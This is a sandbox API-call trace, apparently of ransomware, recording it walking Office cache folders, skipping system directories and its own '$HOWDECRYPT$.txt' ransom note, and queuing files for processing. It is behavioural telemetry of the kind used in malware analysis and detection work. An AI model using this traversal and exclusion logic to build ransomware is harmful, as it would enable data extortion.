lstrlenW (lpString="$Recycle.bin") returned 12 [0084.481] lstrcmpiW (lpString1="ProPlusrWW.msi", lpString2="System Volume Information") returned -1 [0084.481] lstrlenW (lpString="System Volume Information") returned 25 [0084.481] wnsprintfW (in: pszDest=0x30ffc8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.msi") returned 81 [0084.481] StrStrIW (lpFirst="ProPlusrWW.msi", lpSrch=".spyhunter") returned 0x0 [0084.481] lstrcmpW (lpString1="ProPlusrWW.msi", lpString2="$HOWDECRYPT$.txt") returned 1 [0084.481] lstrcmpW (lpString1="ProPlusrWW.msi", lpString2="_uninstalling_.png") returned 1 [0084.481] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.msi") returned 81 [0084.481] GetProcessHeap () returned 0x2c0000 [0084.481] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe4) returned 0x3280a8 [0084.481] GetProcessHeap () returned 0x2c0000 [0084.481] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x32fc28, Size=0x540) returned 0x32fc28 [0084.481] FindNextFileW (in: hFindFile=0x335ea0, lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 1 [0084.481] lstrcmpiW (lpString1="ProPlusrWW.xml", lpString2="Windows") returned -1 [0084.481] lstrlenW (lpString="Windows") returned 7 [0084.481] lstrcmpiW (lpString1="ProPlusrWW.xml", lpString2="$Recycle.bin") returned 1 [0084.481] lstrlenW (lpString="$Recycle.bin") returned 12 [0084.481] lstrcmpiW (lpString1="ProPlusrWW.xml", lpString2="System Volume Information") returned -1 [0084.481] lstrlenW (lpString="System Volume Information") returned 25 [0084.482] wnsprintfW (in: pszDest=0x30ffc8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml") returned 81 [0084.482] StrStrIW (lpFirst="ProPlusrWW.xml", lpSrch=".spyhunter") returned 0x0 [0084.482] lstrcmpW (lpString1="ProPlusrWW.xml", lpString2="$HOWDECRYPT$.txt") returned 1 [0084.482] lstrcmpW (lpString1="ProPlusrWW.xml", lpString2="_uninstalling_.png") returned 1 [0084.482] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml") returned 81 [0084.482] GetProcessHeap () returned 0x2c0000 [0084.482] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe4) returned 0x327ec8 [0084.482] GetProcessHeap () returned 0x2c0000 [0084.482] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x32fc28, Size=0x548) returned 0x32fc28 [0084.482] FindNextFileW (in: hFindFile=0x335ea0, lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 1 [0084.482] lstrcmpiW (lpString1="ProPrWW.cab", lpString2="Windows") returned -1 [0084.482] lstrlenW (lpString="Windows") returned 7 [0084.482] lstrcmpiW (lpString1="ProPrWW.cab", lpString2="$Recycle.bin") returned 1 [0084.482] lstrlenW (lpString="$Recycle.bin") returned 12 [0084.482] lstrcmpiW (lpString1="ProPrWW.cab", lpString2="System Volume Information") returned -1 [0084.482] lstrlenW (lpString="System Volume Information") returned 25 [0084.482] wnsprintfW (in: pszDest=0x30ffc8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW.cab") returned 78 [0084.482] StrStrIW (lpFirst="ProPrWW.cab", lpSrch=".spyhunter") returned 0x0 [0084.482] lstrcmpW (lpString1="ProPrWW.cab", lpString2="$HOWDECRYPT$.txt") returned 1 [0084.482] lstrcmpW (lpString1="ProPrWW.cab", lpString2="_uninstalling_.png") returned 1 [0084.482] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW.cab") returned 78 [0084.482] GetProcessHeap () returned 0x2c0000 [0084.482] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xde) returned 0x326b70 [0084.482] GetProcessHeap () returned 0x2c0000 [0084.482] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x32fc28, Size=0x550) returned 0x32fc28 [0084.482] FindNextFileW (in: hFindFile=0x335ea0, lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 1 [0084.482] lstrcmpiW (lpString1="ProPrWW2.cab", lpString2="Windows") returned -1 [0084.482] lstrlenW (lpString="Windows") returned 7 [0084.482] lstrcmpiW (lpString1="ProPrWW2.cab", lpString2="$Recycle.bin") returned 1 [0084.482] lstrlenW (lpString="$Recycle.bin") returned 12 [0084.482] lstrcmpiW (lpString1="ProPrWW2.cab", lpString2="System Volume Information") returned -1 [0084.482] lstrlenW (lpString="System Volume Information") returned 25 [0084.482] wnsprintfW (in: pszDest=0x30ffc8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW2.cab") returned 79 [0084.482] StrStrIW (lpFirst="ProPrWW2.cab", lpSrch=".spyhunter") returned 0x0 [0084.482] lstrcmpW (lpString1="ProPrWW2.cab", lpString2="$HOWDECRYPT$.txt") returned 1 [0084.482] lstrcmpW (lpString1="ProPrWW2.cab", lpString2="_uninstalling_.png") returned 1 [0084.483] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW2.cab") returned 79 [0084.483] GetProcessHeap () returned 0x2c0000 [0084.483] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe0) returned 0x326d40 [0084.483] GetProcessHeap () returned 0x2c0000 [0084.483] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x32fc28, Size=0x558) returned 0x32fc28 [0084.483] FindNextFileW (in: hFindFile=0x335ea0, lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 1 [0084.483] lstrcmpiW (lpString1="setup.exe", lpString2="Windows") returned -1 [0084.483] lstrlenW (lpString="Windows") returned 7 [0084.483] lstrcmpiW (lpString1="setup.exe", lpString2="$Recycle.bin") returned 1 [0084.483] lstrlenW (lpString="$Recycle.bin") returned 12 [0084.483] lstrcmpiW (lpString1="setup.exe", lpString2="System Volume Information") returned -1 [0084.483] lstrlenW (lpString="System Volume Information") returned 25 [0084.483] wnsprintfW (in: pszDest=0x30ffc8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\setup.exe") returned 76 [0084.483] StrStrIW (lpFirst="setup.exe", lpSrch=".spyhunter") returned 0x0 [0084.483] lstrcmpW (lpString1="setup.exe", lpString2="$HOWDECRYPT$.txt") returned 1 [0084.483] lstrcmpW (lpString1="setup.exe", lpString2="_uninstalling_.png") returned 1 [0084.483] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\setup.exe") returned 76 [0084.483] GetProcessHeap () returned 0x2c0000 [0084.483] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xda) returned 0x326c58 [0084.483] GetProcessHeap () returned 0x2c0000 [0084.483] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x32fc28, Size=0x560) returned 0x32fc28 [0084.483] FindNextFileW (in: hFindFile=0x335ea0, lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 1 [0084.483] lstrcmpiW (lpString1="Setup.xml", lpString2="Windows") returned -1 [0084.483] lstrlenW (lpString="Windows") returned 7 [0084.483] lstrcmpiW (lpString1="Setup.xml", lpString2="$Recycle.bin") returned 1 [0084.483] lstrlenW (lpString="$Recycle.bin") returned 12 [0084.483] lstrcmpiW (lpString1="Setup.xml", lpString2="System Volume Information") returned -1 [0084.483] lstrlenW (lpString="System Volume Information") returned 25 [0084.483] wnsprintfW (in: pszDest=0x30ffc8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0084.483] StrStrIW (lpFirst="Setup.xml", lpSrch=".spyhunter") returned 0x0 [0084.483] lstrcmpW (lpString1="Setup.xml", lpString2="$HOWDECRYPT$.txt") returned 1 [0084.483] lstrcmpW (lpString1="Setup.xml", lpString2="_uninstalling_.png") returned 1 [0084.483] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0084.483] GetProcessHeap () returned 0x2c0000 [0084.483] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xda) returned 0x326e28 [0084.484] GetProcessHeap () returned 0x2c0000 [0084.484] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x32fc28, Size=0x568) returned 0x32fc28 [0084.484] FindNextFileW (in: hFindFile=0x335ea0, lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 0 [0084.484] FindClose (in: hFindFile=0x335ea0 | out: hFindFile=0x335ea0) returned 1 [0084.484] wnsprintfW (in: pszDest=0x30ffc8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\$HOWDECRYPT$.txt") returned 83 [0084.484] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\$HOWDECRYPT$.txt") returned 83 [0084.484] GetProcessHeap () returned 0x2c0000 [0084.484] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe8) returned 0x328468 [0084.484] GetProcessHeap () returned 0x2c0000 [0084.484] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x32fc28, Size=0x570) returned 0x32fc28 [0084.485] GetProcessHeap () returned 0x2c0000 [0084.485] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x30ffc8 | out: hHeap=0x2c0000) returned 1 [0084.485] FindNextFileW (in: hFindFile=0x30b3d8, lpFindFileData=0x298f698 | out: lpFindFileData=0x298f698) returned 1 [0084.485] lstrcmpiW (lpString1="{91140000-003B-0000-1000-0000000FF1CE}-C", lpString2="Windows") returned -1 [0084.485] lstrlenW (lpString="Windows") returned 7 [0084.485] lstrcmpiW (lpString1="{91140000-003B-0000-1000-0000000FF1CE}-C", lpString2="$Recycle.bin") returned 1 [0084.485] lstrlenW (lpString="$Recycle.bin") returned 12 [0084.485] lstrcmpiW (lpString1="{91140000-003B-0000-1000-0000000FF1CE}-C", lpString2="System Volume Information") returned -1 [0084.485] lstrlenW (lpString="System Volume Information") returned 25 [0084.485] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C") returned 66 [0084.485] lstrcmpW (lpString1="{91140000-003B-0000-1000-0000000FF1CE}-C", lpString2=".") returned 1 [0084.485] lstrcmpW (lpString1="{91140000-003B-0000-1000-0000000FF1CE}-C", lpString2="..") returned 1 [0084.485] GetProcessHeap () returned 0x2c0000 [0084.485] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x30ffc8 [0084.485] wnsprintfW (in: pszDest=0x30ffc8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\*") returned 68 [0084.485] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\*", lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 0x335ea0 [0084.540] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0084.541] lstrlenW (lpString="Windows") returned 7 [0084.541] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0084.541] lstrlenW (lpString="$Recycle.bin") returned 12 [0084.541] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0084.541] lstrlenW (lpString="System Volume Information") returned 25 [0084.541] wnsprintfW (in: pszDest=0x30ffc8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\.") returned 68 [0084.541] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0084.541] StrStrIW (lpFirst=".", lpSrch=".spyhunter") returned 0x0 [0084.541] lstrcmpW (lpString1=".", lpString2="$HOWDECRYPT$.txt") returned 1 [0084.541] lstrcmpW (lpString1=".", lpString2="_uninstalling_.png") returned -1 [0084.541] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\.") returned 68 [0084.541] GetProcessHeap () returned 0x2c0000 [0084.541] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xca) returned 0x323a68 [0084.541] GetProcessHeap () returned 0x2c0000 [0084.541] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x32fc28, Size=0x560) returned 0x32fc28 [0084.541] FindNextFileW (in: hFindFile=0x335ea0, lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 1 [0084.541] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0084.541] lstrlenW (lpString="Windows") returned 7 [0084.541] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0084.541] lstrlenW (lpString="$Recycle.bin") returned 12 [0084.541] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0084.541] lstrlenW (lpString="System Volume Information") returned 25 [0084.542] wnsprintfW (in: pszDest=0x30ffc8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\..") returned 69 [0084.542] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0084.542] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0084.542] StrStrIW (lpFirst="..", lpSrch=".spyhunter") returned 0x0 [0084.542] lstrcmpW (lpString1="..", lpString2="$HOWDECRYPT$.txt") returned 1 [0084.542] lstrcmpW (lpString1="..", lpString2="_uninstalling_.png") returned -1 [0084.542] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\..") returned 69 [0084.542] GetProcessHeap () returned 0x2c0000 [0084.542] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xcc) returned 0x323b40 [0084.542] GetProcessHeap () returned 0x2c0000 [0084.542] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x32fc28, Size=0x568) returned 0x32fc28 [0084.542] FindNextFileW (in: hFindFile=0x335ea0, lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 1 [0084.542] lstrcmpiW (lpString1="Office32WW.msi", lpString2="Windows") returned -1 [0084.542] lstrlenW (lpString="Windows") returned 7 [0084.542] lstrcmpiW (lpString1="Office32WW.msi", lpString2="$Recycle.bin") returned 1 [0084.542] lstrlenW (lpString="$Recycle.bin") returned 12 [0084.542] lstrcmpiW (lpString1="Office32WW.msi", lpString2="System Volume Information") returned -1 [0084.542] lstrlenW (lpString="System Volume Information") returned 25 [0084.542] wnsprintfW (in: pszDest=0x30ffc8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 81 [0084.542] StrStrIW (lpFirst="Office32WW.msi", lpSrch=".spyhunter") returned 0x0 [0084.542] lstrcmpW (lpString1="Office32WW.msi", lpString2="$HOWDECRYPT$.txt") returned 1 [0084.542] lstrcmpW (lpString1="Office32WW.msi", lpString2="_uninstalling_.png") returned 1 [0084.542] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 81 [0084.542] GetProcessHeap () returned 0x2c0000 [0084.542] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe4) returned 0x328468 [0084.542] GetProcessHeap () returned 0x2c0000 [0084.542] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x32fc28, Size=0x570) returned 0x32fc28 [0084.542] FindNextFileW (in: hFindFile=0x335ea0, lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 1 [0084.542] lstrcmpiW (lpString1="Office32WW.xml", lpString2="Windows") returned -1 [0084.542] lstrlenW (lpString="Windows") returned 7 [0084.543] lstrcmpiW (lpString1="Office32WW.xml", lpString2="$Recycle.bin") returned 1 [0084.543] lstrlenW (lpString="$Recycle.bin") returned 12 [0084.543] lstrcmpiW (lpString1="Office32WW.xml", lpString2="System Volume Information") returned -1 [0084.543] lstrlenW (lpString="System Volume Information") returned 25 [0084.543] wnsprintfW (in: pszDest=0x30ffc8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 81 [0084.543] StrStrIW (lpFirst="Office32WW.xml", lpSrch=".spyhunter") returned 0x0 [0084.543] lstrcmpW (lpString1="Office32WW.xml", lpString2="$HOWDECRYPT$.txt") returned 1 [0084.543] lstrcmpW (lpString1="Office32WW.xml", lpString2="_uninstalling_.png") returned 1 [0084.543] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 81 [0084.543] GetProcessHeap () returned 0x2c0000 [0084.543] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe4) returned 0x328288 [0084.543] GetProcessHeap () returned 0x2c0000 [0084.543] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x32fc28, Size=0x578) returned 0x32fc28 [0084.543] FindNextFileW (in: hFindFile=0x335ea0, lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 1 [0084.543] lstrcmpiW (lpString1="ose.exe", lpString2="Windows") returned -1 [0084.543] lstrlenW (lpString="Windows") returned 7 [0084.543] lstrcmpiW (lpString1="ose.exe", lpString2="$Recycle.bin") returned 1 [0084.543] lstrlenW (lpString="$Recycle.bin") returned 12 [0084.543] lstrcmpiW (lpString1="ose.exe", lpString2="System Volume Information") returned -1 [0084.543] lstrlenW (lpString="System Volume Information") returned 25 [0084.543] wnsprintfW (in: pszDest=0x30ffc8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\ose.exe") returned 74 [0084.543] StrStrIW (lpFirst="ose.exe", lpSrch=".spyhunter") returned 0x0 [0084.543] lstrcmpW (lpString1="ose.exe", lpString2="$HOWDECRYPT$.txt") returned 1 [0084.543] lstrcmpW (lpString1="ose.exe", lpString2="_uninstalling_.png") returned 1 [0084.543] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\ose.exe") returned 74 [0084.543] GetProcessHeap () returned 0x2c0000 [0084.543] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd6) returned 0x3376d0 [0084.543] GetProcessHeap () returned 0x2c0000 [0084.543] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x32fc28, Size=0x580) returned 0x32fc28 [0084.543] FindNextFileW (in: hFindFile=0x335ea0, lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 1 [0084.543] lstrcmpiW (lpString1="osetup.dll", lpString2="Windows") returned -1 [0084.543] lstrlenW (lpString="Windows") returned 7 [0084.543] lstrcmpiW (lpString1="osetup.dll", lpString2="$Recycle.bin") returned 1 [0084.543] lstrlenW (lpString="$Recycle.bin") returned 12 [0084.543] lstrcmpiW (lpString1="osetup.dll", lpString2="System Volume Information") returned -1 [0084.543] lstrlenW (lpString="System Volume Information") returned 25 [0084.543] wnsprintfW (in: pszDest=0x30ffc8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 77 [0084.543] StrStrIW (lpFirst="osetup.dll", lpSrch=".spyhunter") returned 0x0 [0084.544] lstrcmpW (lpString1="osetup.dll", lpString2="$HOWDECRYPT$.txt") returned 1 [0084.544] lstrcmpW (lpString1="osetup.dll", lpString2="_uninstalling_.png") returned 1 [0084.544] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 77 [0084.544] GetProcessHeap () returned 0x2c0000 [0084.544] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xdc) returned 0x326f10 [0084.544] GetProcessHeap () returned 0x2c0000 [0084.544] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x32fc28, Size=0x588) returned 0x32fc28 [0084.544] FindNextFileW (in: hFindFile=0x335ea0, lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 1 [0084.544] lstrcmpiW (lpString1="OWOW32WW.cab", lpString2="Windows") returned -1 [0084.544] lstrlenW (lpString="Windows") returned 7 [0084.544] lstrcmpiW (lpString1="OWOW32WW.cab", lpString2="$Recycle.bin") returned 1 [0084.544] lstrlenW (lpString="$Recycle.bin") returned 12 [0084.544] lstrcmpiW (lpString1="OWOW32WW.cab", lpString2="System Volume Information") returned -1 [0084.544] lstrlenW (lpString="System Volume Information") returned 25 [0084.544] wnsprintfW (in: pszDest=0x30ffc8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 79 [0084.544] StrStrIW (lpFirst="OWOW32WW.cab", lpSrch=".spyhunter") returned 0x0 [0084.544] lstrcmpW (lpString1="OWOW32WW.cab", lpString2="$HOWDECRYPT$.txt") returned 1 [0084.544] lstrcmpW (lpString1="OWOW32WW.cab", lpString2="_uninstalling_.png") returned 1 [0084.544] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 79 [0084.544] GetProcessHeap () returned 0x2c0000 [0084.544] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe0) returned 0x326ff8 [0084.544] GetProcessHeap () returned 0x2c0000 [0084.544] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x32fc28, Size=0x590) returned 0x32fc28 [0084.544] FindNextFileW (in: hFindFile=0x335ea0, lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 1 [0084.544] lstrcmpiW (lpString1="PidGenX.dll", lpString2="Windows") returned -1 [0084.544] lstrlenW (lpString="Windows") returned 7 [0084.544] lstrcmpiW (lpString1="PidGenX.dll", lpString2="$Recycle.bin") returned 1 [0084.544] lstrlenW (lpString="$Recycle.bin") returned 12 [0084.544] lstrcmpiW (lpString1="PidGenX.dll", lpString2="System Volume Information") returned -1 [0084.544] lstrlenW (lpString="System Volume Information") returned 25 [0084.544] wnsprintfW (in: pszDest=0x30ffc8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 78 [0084.544] StrStrIW (lpFirst="PidGenX.dll", lpSrch=".spyhunter") returned 0x0 [0084.544] lstrcmpW (lpString1="PidGenX.dll", lpString2="$HOWDECRYPT$.txt") returned 1 [0084.544] lstrcmpW (lpString1="PidGenX.dll", lpString2="_uninstalling_.png") returned 1 [0084.544] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 78 [0084.544] GetProcessHeap () returned 0x2c0000 [0084.544] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xde) returned 0x3270e0 [0084.544] GetProcessHeap () returned 0x2c0000 [0084.545] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x32fc28, Size=0x598) returned 0x32fc28 [0084.545] FindNextFileW (in: hFindFile=0x335ea0, lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 1 [0084.545] lstrcmpiW (lpString1="pkeyconfig-office.xrm-ms", lpString2="Windows") returned -1 [0084.545] lstrlenW (lpString="Windows") returned 7 [0084.545] lstrcmpiW (lpString1="pkeyconfig-office.xrm-ms", lpString2="$Recycle.bin") returned 1 [0084.545] lstrlenW (lpString="$Recycle.bin") returned 12 [0084.545] lstrcmpiW (lpString1="pkeyconfig-office.xrm-ms", lpString2="System Volume Information") returned -1 [0084.545] lstrlenW (lpString="System Volume Information") returned 25 [0084.545] wnsprintfW (in: pszDest=0x30ffc8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 91 [0084.545] StrStrIW (lpFirst="pkeyconfig-office.xrm-ms", lpSrch=".spyhunter") returned 0x0 [0084.545] lstrcmpW (lpString1="pkeyconfig-office.xrm-ms", lpString2="$HOWDECRYPT$.txt") returned 1 [0084.545] lstrcmpW (lpString1="pkeyconfig-office.xrm-ms", lpString2="_uninstalling_.png") returned 1 [0084.545] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 91 [0084.545] GetProcessHeap () returned 0x2c0000 [0084.545] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xf8) returned 0x330c20 [0084.545] GetProcessHeap () returned 0x2c0000 [0084.545] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x32fc28, Size=0x5a0) returned 0x32fc28 [0084.545] FindNextFileW (in: hFindFile=0x335ea0, lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 1 [0084.545] lstrcmpiW (lpString1="PrjProrWW.msi", lpString2="Windows") returned -1 [0084.545] lstrlenW (lpString="Windows") returned 7 [0084.545] lstrcmpiW (lpString1="PrjProrWW.msi", lpString2="$Recycle.bin") returned 1 [0084.545] lstrlenW (lpString="$Recycle.bin") returned 12 [0084.545] lstrcmpiW (lpString1="PrjProrWW.msi", lpString2="System Volume Information") returned -1 [0084.545] lstrlenW (lpString="System Volume Information") returned 25 [0084.545] wnsprintfW (in: pszDest=0x30ffc8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.msi") returned 80 [0084.545] StrStrIW (lpFirst="PrjProrWW.msi", lpSrch=".spyhunter") returned 0x0 [0084.545] lstrcmpW (lpString1="PrjProrWW.msi", lpString2="$HOWDECRYPT$.txt") returned 1 [0084.545] lstrcmpW (lpString1="PrjProrWW.msi", lpString2="_uninstalling_.png") returned 1 [0084.545] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.msi") returned 80 [0084.545] GetProcessHeap () returned 0x2c0000 [0084.545] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe2) returned 0x327dd8 [0084.545] GetProcessHeap () returned 0x2c0000 [0084.545] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x32fc28, Size=0x5a8) returned 0x32fc28 [0084.545] FindNextFileW (in: hFindFile=0x335ea0, lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 1 [0084.545] lstrcmpiW (lpString1="PrjProrWW.xml", lpString2="Windows") returned -1 [0084.545] lstrlenW (lpString="Windows") returned 7 [0084.546] lstrcmpiW (lpString1="PrjProrWW.xml", lpString2="$Recycle.bin") returned 1 [0084.546] lstrlenW (lpString="$Recycle.bin") returned 12 [0084.546] lstrcmpiW (lpString1="PrjProrWW.xml", lpString2="System Volume Information") returned -1 [0084.546] lstrlenW (lpString="System Volume Information") returned 25 [0084.546] wnsprintfW (in: pszDest=0x30ffc8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml") returned 80 [0084.546] StrStrIW (lpFirst="PrjProrWW.xml", lpSrch=".spyhunter") returned 0x0 [0084.546] lstrcmpW (lpString1="PrjProrWW.xml", lpString2="$HOWDECRYPT$.txt") returned 1 [0084.546] lstrcmpW (lpString1="PrjProrWW.xml", lpString2="_uninstalling_.png") returned 1 [0084.546] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml") returned 80 [0084.546] GetProcessHeap () returned 0x2c0000 [0084.546] RtlAllocateHeap (HeapHandle=0x2c0000, 